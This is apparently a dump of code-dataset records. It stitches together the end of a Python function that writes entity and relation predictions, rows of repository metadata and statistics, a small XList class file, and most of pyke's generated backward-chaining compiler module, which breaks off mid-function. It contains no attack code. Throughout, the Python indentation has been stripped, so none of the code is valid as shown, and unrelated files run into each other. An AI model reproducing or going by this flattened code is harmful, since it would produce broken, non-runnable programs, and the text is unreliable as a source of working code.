sequence_label_domain (str, optional): sequence label domain. Defaults to None.
"""
with open(file_path, 'w') as fout:
for sent_output in outputs:
seq_len = sent_output['seq_len']
assert 'tokens' in sent_output
tokens = [vocab.get_token_from_index(token, 'tokens') for token in sent_output['tokens'][:seq_len]]
print("Token\t{}".format(' '.join(tokens)), file=fout)
if 'joint_label_matrix' in sent_output:
for row in sent_output['joint_label_matrix'][:seq_len]:
print("Joint-Label-True\t{}".format(' '.join(
[vocab.get_token_from_index(item, 'ent_rel_id') for item in row[:seq_len]])),
file=fout)
if 'joint_label_preds' in sent_output:
for row in sent_output['joint_label_preds'][:seq_len]:
print("Joint-Label-Pred\t{}".format(' '.join(
[vocab.get_token_from_index(item, 'ent_rel_id') for item in row[:seq_len]])),
file=fout)
if 'separate_positions' in sent_output:
print("Separate-Position-True\t{}".format(' '.join(map(str, sent_output['separate_positions']))),
file=fout)
if 'all_separate_position_preds' in sent_output:
print("Separate-Position-Pred\t{}".format(' '.join(map(str,
sent_output['all_separate_position_preds']))),
file=fout)
if 'all_ent_span_preds' in sent_output:
for span in sent_output['all_ent_span_preds']:
print("Ent-Span-Pred\t{}".format(span), file=fout)
if 'span2ent' in sent_output:
for span, ent in sent_output['span2ent'].items():
ent = vocab.get_token_from_index(ent, 'ent_rel_id')
assert ent != 'None', "true relation can not be `None`."
print("Ent-True\t{}\t{}\t{}".format(ent, span, ' '.join(tokens[span[0]:span[1]])), file=fout)
if 'all_ent_preds' in sent_output:
for span, ent in sent_output['all_ent_preds'].items():
# ent = vocab.get_token_from_index(ent, 'span2ent')
print("Ent-Pred\t{}\t{}\t{}".format(ent, span, ' '.join(tokens[span[0]:span[1]])), file=fout)
if 'span2rel' in sent_output:
for (span1, span2), rel in sent_output['span2rel'].items():
rel = vocab.get_token_from_index(rel, 'ent_rel_id')
assert rel != 'None', "true relation can not be `None`."
if rel[-1] == '<':
span1, span2 = span2, span1
print("Rel-True\t{}\t{}\t{}\t{}\t{}".format(rel, span1, span2, ' '.join(tokens[span1[0]:span1[1]]),
' '.join(tokens[span2[0]:span2[1]])),
file=fout)
if 'all_rel_preds' in sent_output:
for (span1, span2), rel in sent_output['all_rel_preds'].items():
# rel = vocab.get_token_from_index(rel, 'span2rel')
print("Rel-Pred\t{}\t{}\t{}\t{}\t{}".format(rel, span1, span2, ' '.join(tokens[span1[0]:span1[1]]),
' '.join(tokens[span2[0]:span2[1]])),
file=fout)
print(file=fout)
| 50.752941 | 119 | 0.513792 | 995 | 8,628 | 4.233166 | 0.075377 | 0.11396 | 0.111111 | 0.064577 | 0.920465 | 0.879867 | 0.84188 | 0.84188 | 0.84188 | 0.819088 | 0 | 0.015569 | 0.352341 | 8,628 | 169 | 120 | 51.053254 | 0.738189 | 0.080436 | 0 | 0.782609 | 0 | 0 | 0.177817 | 0.050496 | 0 | 0 | 0 | 0 | 0.052174 | 1 | 0.017391 | false | 0 | 0 | 0 | 0.017391 | 0.234783 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7a4038df43b2315e06fd253bf418919261debd0b | 222 | py | Python | Chapter 8/02 - Intercepting class instance creation process/xlist.py | bernoli/Expert-Python-Programming-Fourth-Edition | 05b4bd64c66bea3252f06afee7a7a1e2bd93d171 | [
"MIT"
] | 56 | 2021-05-24T15:24:51.000Z | 2022-03-21T19:38:27.000Z | Chapter 8/02 - Intercepting class instance creation process/xlist.py | saibaldas/Expert-Python-Programming-Fourth-Edition | 572d47a802e7b1fe429f782d9aeb62f411cb5307 | [
"MIT"
] | 2 | 2020-11-03T12:53:26.000Z | 2021-05-11T23:47:39.000Z | Chapter 8/02 - Intercepting class instance creation process/xlist.py | saibaldas/Expert-Python-Programming-Fourth-Edition | 572d47a802e7b1fe429f782d9aeb62f411cb5307 | [
"MIT"
] | 37 | 2021-05-27T12:32:21.000Z | 2022-03-10T23:05:54.000Z | from collections import UserList
class XList(UserList):
@classmethod
def double(cls, iterable):
return cls(iterable) * 2
@classmethod
def tripple(cls, iterable):
return cls(iterable) * 3
| 18.5 | 32 | 0.657658 | 25 | 222 | 5.84 | 0.6 | 0.30137 | 0.232877 | 0.273973 | 0.383562 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012121 | 0.256757 | 222 | 11 | 33 | 20.181818 | 0.872727 | 0 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.125 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
8f9cece743cd74422714434aa93f0a9f7dcd9c7f | 151,930 | py | Python | pyke/krb_compiler/compiler_bc.py | rch/pyke-1.1.1 | e399b06f0c655eb6baafebaed09b4eb8f9c44b82 | [
"MIT"
] | 76 | 2015-04-20T12:10:25.000Z | 2021-11-27T20:26:27.000Z | pyke/krb_compiler/compiler_bc.py | w-simon/pyke | cfe95d8aaa06de123264f9b7f5bea20eb5924ecd | [
"MIT"
] | 2 | 2016-03-09T14:33:27.000Z | 2018-10-22T11:25:49.000Z | pyke/krb_compiler/compiler_bc.py | w-simon/pyke | cfe95d8aaa06de123264f9b7f5bea20eb5924ecd | [
"MIT"
] | 42 | 2015-03-16T13:11:30.000Z | 2022-02-12T14:45:48.000Z | # compiler_bc.py
from __future__ import with_statement
import itertools
from pyke import contexts, pattern, bc_rule
pyke_version = '1.1.1'
compiler_version = 1
def file(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
helpers.fc_head(context.lookup_data('rb_name'))):
context.end_save_all_undo()
mark2 = context.mark(True)
if rule.pattern(1).match_data(context, context,
helpers.bc_head(context.lookup_data('rb_name'))):
context.end_save_all_undo()
mark3 = context.mark(True)
if rule.pattern(2).match_data(context, context,
helpers.plan_head(context.lookup_data('rb_name'))):
context.end_save_all_undo()
flag_4 = False
with engine.prove(rule.rule_base.root_name, 'rule_decl', context,
(rule.pattern(3),
rule.pattern(4),
rule.pattern(5),)) \
as gen_4:
for x_4 in gen_4:
flag_4 = True
assert x_4 is None, \
"compiler.file: got unexpected plan from when clause 4"
flag_5 = False
with engine.prove(rule.rule_base.root_name, 'fc_rules', context,
(rule.pattern(6),
rule.pattern(7),
rule.pattern(8),)) \
as gen_5:
for x_5 in gen_5:
flag_5 = True
assert x_5 is None, \
"compiler.file: got unexpected plan from when clause 5"
flag_6 = False
with engine.prove(rule.rule_base.root_name, 'bc_rules', context,
(rule.pattern(3),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),)) \
as gen_6:
for x_6 in gen_6:
flag_6 = True
assert x_6 is None, \
"compiler.file: got unexpected plan from when clause 6"
mark7 = context.mark(True)
if rule.pattern(13).match_data(context, context,
(context.lookup_data('fc_head'),
context.lookup_data('fc_fun_lines'),
"",
"def populate(engine):",
('INDENT', 2),
context.lookup_data('decl_line'),
context.lookup_data('fc_init_lines'),
'POPINDENT',
"",
context.lookup_data('fc_extra_lines'),
) \
if context.lookup_data('fc_fun_lines') \
else ()):
context.end_save_all_undo()
mark8 = context.mark(True)
if rule.pattern(14).match_data(context, context,
(context.lookup_data('plan_head'),
context.lookup_data('bc_plan_lines'),
"",
context.lookup_data('plan_extra_lines')) \
if context.lookup_data('bc_plan_lines') \
else ()):
context.end_save_all_undo()
mark9 = context.mark(True)
if rule.pattern(15).match_data(context, context,
(context.lookup_data('bc_head'),
("from %s import %s_plans" %
(context.lookup_data('generated_root_pkg'), context.lookup_data('rb_name'))
if context.lookup_data('bc_plan_lines')
else ()),
context.lookup_data('bc_bc_fun_lines'),
"",
"def populate(engine):",
('INDENT', 2),
context.lookup_data('decl_line'),
context.lookup_data('bc_bc_init_lines'),
'POPINDENT',
"",
context.lookup_data('bc_extra_lines')) \
if context.lookup_data('bc_bc_fun_lines') \
else ()):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark9)
else: context.end_save_all_undo()
context.undo_to_mark(mark8)
else: context.end_save_all_undo()
context.undo_to_mark(mark7)
if not flag_6:
raise AssertionError("compiler.file: 'when' clause 6 failed")
if not flag_5:
raise AssertionError("compiler.file: 'when' clause 5 failed")
if not flag_4:
raise AssertionError("compiler.file: 'when' clause 4 failed")
else: context.end_save_all_undo()
context.undo_to_mark(mark3)
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def rule_decl(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
"This_rule_base = engine.get_create(%r)" % context.lookup_data('rb_name')):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def rule_decl_with_parent(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
"This_rule_base = engine.get_create(%r, %r, %s)" % \
(context.lookup_data('rb_name'), context.lookup_data('parent'),
tuple(repr(sym) for sym in context.lookup_data('excluded_symbols')))):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def fc_rules(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
fc_funs = []
fc_init = []
forall91_worked = True
for python_ans in \
context.lookup_data('fc_rules'):
mark2 = context.mark(True)
if rule.pattern(0).match_data(context, context, python_ans):
context.end_save_all_undo()
forall91_worked = False
flag_3 = False
with engine.prove(rule.rule_base.root_name, 'fc_rule', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(2),)) \
as gen_3:
for x_3 in gen_3:
flag_3 = True
assert x_3 is None, \
"compiler.fc_rules: got unexpected plan from when clause 3"
fc_funs.append(context.lookup_data('fc_fun_1'))
fc_init.append(context.lookup_data('fc_init_1'))
forall91_worked = True
if forall91_worked: break
if not flag_3:
raise AssertionError("compiler.fc_rules: 'when' clause 3 failed")
if not forall91_worked:
context.undo_to_mark(mark2)
break
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
if forall91_worked:
mark5 = context.mark(True)
if rule.pattern(3).match_data(context, context,
tuple(fc_funs)):
context.end_save_all_undo()
mark6 = context.mark(True)
if rule.pattern(4).match_data(context, context,
tuple(fc_init)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark6)
else: context.end_save_all_undo()
context.undo_to_mark(mark5)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def fc_rule_(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
flag_1 = False
with engine.prove(rule.rule_base.root_name, 'fc_premises', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),
rule.pattern(1),
rule.pattern(2),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),)) \
as gen_1:
for x_1 in gen_1:
flag_1 = True
assert x_1 is None, \
"compiler.fc_rule_: got unexpected plan from when clause 1"
flag_2 = False
with engine.prove(rule.rule_base.root_name, 'assertions', context,
(rule.pattern(11),
rule.pattern(12),
rule.pattern(10),
rule.pattern(13),)) \
as gen_2:
for x_2 in gen_2:
flag_2 = True
assert x_2 is None, \
"compiler.fc_rule_: got unexpected plan from when clause 2"
mark3 = context.mark(True)
if rule.pattern(14).match_data(context, context,
("",
"def %s(rule, context = None, index = None):" % context.lookup_data('rule_name'),
("INDENT", 2),
"engine = rule.rule_base.engine",
"if context is None: context = contexts.simple_context()",
"try:",
("INDENT", 2),
context.lookup_data('prem_fn_head'),
context.lookup_data('asserts_fn_lines'),
"rule.rule_base.num_fc_rules_triggered += 1",
context.lookup_data('prem_fn_tail'),
"POPINDENT",
"finally:",
("INDENT", 2),
"context.done()",
"POPINDENT",
"POPINDENT",
)):
context.end_save_all_undo()
mark4 = context.mark(True)
if rule.pattern(15).match_data(context, context,
("",
"fc_rule.fc_rule('%(name)s', This_rule_base, %(name)s," %
{'name': context.lookup_data('rule_name')},
("INDENT", 2),
helpers.add_brackets(context.lookup_data('prem_decl_lines'), '(', '),'),
helpers.list_format(context.lookup_data('patterns_out'), '(', '))'),
"POPINDENT",
)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
else: context.end_save_all_undo()
context.undo_to_mark(mark3)
if not flag_2:
raise AssertionError("compiler.fc_rule_: 'when' clause 2 failed")
if not flag_1:
raise AssertionError("compiler.fc_rule_: 'when' clause 1 failed")
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def fc_premises0(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def fc_premises1(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
flag_1 = False
with engine.prove(rule.rule_base.root_name, 'fc_premise', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),)) \
as gen_1:
for x_1 in gen_1:
flag_1 = True
assert x_1 is None, \
"compiler.fc_premises1: got unexpected plan from when clause 1"
flag_2 = False
with engine.prove(rule.rule_base.root_name, 'fc_premises', context,
(rule.pattern(0),
rule.pattern(2),
rule.pattern(13),
rule.pattern(14),
rule.pattern(4),
rule.pattern(5),
rule.pattern(15),
rule.pattern(16),
rule.pattern(9),
rule.pattern(17),
rule.pattern(18),
rule.pattern(12),
rule.pattern(19),)) \
as gen_2:
for x_2 in gen_2:
flag_2 = True
assert x_2 is None, \
"compiler.fc_premises1: got unexpected plan from when clause 2"
mark3 = context.mark(True)
if rule.pattern(20).match_data(context, context,
context.lookup_data('decl_lines1') + context.lookup_data('decl_lines2')):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark3)
if not flag_2:
raise AssertionError("compiler.fc_premises1: 'when' clause 2 failed")
if not flag_1:
raise AssertionError("compiler.fc_premises1: 'when' clause 1 failed")
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def fc_premise(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
with engine.prove(rule.rule_base.root_name, 'gen_fc_for', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),)) \
as gen_1:
for x_1 in gen_1:
assert x_1 is None, \
"compiler.fc_premise: got unexpected plan from when clause 1"
mark2 = context.mark(True)
if rule.pattern(7).match_data(context, context,
(() if context.lookup_data('break_cond') is None
else "if %s: break" % context.lookup_data('break_cond'),
'POPINDENT',
'POPINDENT',),):
context.end_save_all_undo()
mark3 = context.mark(True)
if rule.pattern(8).match_data(context, context,
context.lookup_data('clause_num') + 1):
context.end_save_all_undo()
mark4 = context.mark(True)
if rule.pattern(9).match_data(context, context,
context.lookup_data('decl_num_in') + 1):
context.end_save_all_undo()
mark5 = context.mark(True)
if rule.pattern(10).match_data(context, context,
("(%r, %r," % (context.lookup_data('kb_name'), context.lookup_data('entity_name')),
('INDENT', 1),
helpers.list_format(context.lookup_data('arg_patterns'), '(', '),'),
"%s)," % context.lookup_data('multi_match'),
"POPINDENT",
)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark5)
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
else: context.end_save_all_undo()
context.undo_to_mark(mark3)
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def gen_fc_for_false(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
(('STARTING_LINENO', context.lookup_data('start_lineno')),
"with knowledge_base.Gen_once if index == %d \\" % \
context.lookup_data('decl_num'),
('INDENT', 9),
"else engine.lookup(%r, %r, context," % \
(context.lookup_data('kb_name'), context.lookup_data('entity_name')),
('INDENT', 19),
"rule.foreach_patterns(%d)) \\" % context.lookup_data('decl_num'),
'POPINDENT',
'POPINDENT',
('INDENT', 2),
"as gen_%d:" % context.lookup_data('decl_num'),
"for dummy in gen_%d:" % context.lookup_data('decl_num'),
('ENDING_LINENO', context.lookup_data('end_lineno')),
('INDENT', 2),
)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def gen_fc_for_true(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
(('STARTING_LINENO', context.lookup_data('start_lineno')),
"with engine.lookup(%r, %r, context, \\" % \
(context.lookup_data('kb_name'), context.lookup_data('entity_name')),
('INDENT', 19),
"rule.foreach_patterns(%d)) \\" % context.lookup_data('decl_num'),
'POPINDENT',
('INDENT', 2),
"as gen_%d:" % context.lookup_data('decl_num'),
"for dummy in gen_%d:" % context.lookup_data('decl_num'),
('ENDING_LINENO', context.lookup_data('end_lineno')),
('INDENT', 2))):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def fc_first(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
"first%d_worked" % context.lookup_data('clause_num')):
context.end_save_all_undo()
flag_2 = False
with engine.prove(rule.rule_base.root_name, 'fc_premises', context,
(rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(0),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),)) \
as gen_2:
for x_2 in gen_2:
flag_2 = True
assert x_2 is None, \
"compiler.fc_first: got unexpected plan from when clause 2"
mark3 = context.mark(True)
if rule.pattern(13).match_data(context, context,
"%s = False" % context.lookup_data('break_cond')):
context.end_save_all_undo()
mark4 = context.mark(True)
if rule.pattern(14).match_data(context, context,
"%s = True" % context.lookup_data('break_cond')):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
else: context.end_save_all_undo()
context.undo_to_mark(mark3)
if not flag_2:
raise AssertionError("compiler.fc_first: 'when' clause 2 failed")
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def fc_forall_None(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
flag_1 = False
with engine.prove(rule.rule_base.root_name, 'fc_premises', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),)) \
as gen_1:
for x_1 in gen_1:
flag_1 = True
assert x_1 is None, \
"compiler.fc_forall_None: got unexpected plan from when clause 1"
mark2 = context.mark(True)
if rule.pattern(13).match_data(context, context,
context.lookup_data('fn_head1') + context.lookup_data('fn_tail1')):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
if not flag_1:
raise AssertionError("compiler.fc_forall_None: 'when' clause 1 failed")
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def fc_forall_require(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
"forall%d_worked" % context.lookup_data('start_lineno')):
context.end_save_all_undo()
mark2 = context.mark(True)
if rule.pattern(1).match_data(context, context,
"not forall%d_worked" % context.lookup_data('start_lineno')):
context.end_save_all_undo()
flag_3 = False
with engine.prove(rule.rule_base.root_name, 'fc_premises', context,
(rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(1),
rule.pattern(6),
rule.pattern(7),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),
rule.pattern(13),)) \
as gen_3:
for x_3 in gen_3:
flag_3 = True
assert x_3 is None, \
"compiler.fc_forall_require: got unexpected plan from when clause 3"
flag_4 = False
with engine.prove(rule.rule_base.root_name, 'fc_premises', context,
(rule.pattern(2),
rule.pattern(4),
rule.pattern(14),
rule.pattern(15),
rule.pattern(0),
rule.pattern(6),
rule.pattern(16),
rule.pattern(17),
rule.pattern(10),
rule.pattern(18),
rule.pattern(19),
rule.pattern(13),
rule.pattern(20),)) \
as gen_4:
for x_4 in gen_4:
flag_4 = True
assert x_4 is None, \
"compiler.fc_forall_require: got unexpected plan from when clause 4"
mark5 = context.mark(True)
if rule.pattern(21).match_data(context, context,
("forall%d_worked = True" % context.lookup_data('start_lineno'),
context.lookup_data('fn_head1'),
"forall%d_worked = False" % context.lookup_data('start_lineno'),
context.lookup_data('fn_head2'),
"forall%d_worked = True" % context.lookup_data('start_lineno'),
context.lookup_data('fn_tail2'),
context.lookup_data('fn_tail1'),
"if forall%d_worked:" % context.lookup_data('start_lineno'),
("INDENT", 2))):
context.end_save_all_undo()
mark6 = context.mark(True)
if rule.pattern(22).match_data(context, context,
context.lookup_data('decl_lines1') + context.lookup_data('decl_lines2')):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark6)
else: context.end_save_all_undo()
context.undo_to_mark(mark5)
if not flag_4:
raise AssertionError("compiler.fc_forall_require: 'when' clause 4 failed")
if not flag_3:
raise AssertionError("compiler.fc_forall_require: 'when' clause 3 failed")
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def fc_notany(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
"notany%d_worked" % context.lookup_data('start_lineno')):
context.end_save_all_undo()
mark2 = context.mark(True)
if rule.pattern(1).match_data(context, context,
"not notany%d_worked" % context.lookup_data('start_lineno')):
context.end_save_all_undo()
flag_3 = False
with engine.prove(rule.rule_base.root_name, 'fc_premises', context,
(rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(1),
rule.pattern(6),
rule.pattern(7),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),
rule.pattern(13),)) \
as gen_3:
for x_3 in gen_3:
flag_3 = True
assert x_3 is None, \
"compiler.fc_notany: got unexpected plan from when clause 3"
mark4 = context.mark(True)
if rule.pattern(14).match_data(context, context,
("notany%d_worked = True" % context.lookup_data('start_lineno'),
context.lookup_data('fn_head1'),
"notany%d_worked = False" % context.lookup_data('start_lineno'),
context.lookup_data('fn_tail1'),
"if notany%d_worked:" % context.lookup_data('start_lineno'),
("INDENT", 2))):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
if not flag_3:
raise AssertionError("compiler.fc_notany: 'when' clause 3 failed")
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def fc_python_premise(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
context.lookup_data('clause_num') + 1):
context.end_save_all_undo()
with engine.prove(rule.rule_base.root_name, 'python_premise', context,
(rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),)) \
as gen_2:
for x_2 in gen_2:
assert x_2 is None, \
"compiler.fc_python_premise: got unexpected plan from when clause 2"
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def assertions_0(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def assertions_n(rule, arg_patterns, arg_context):
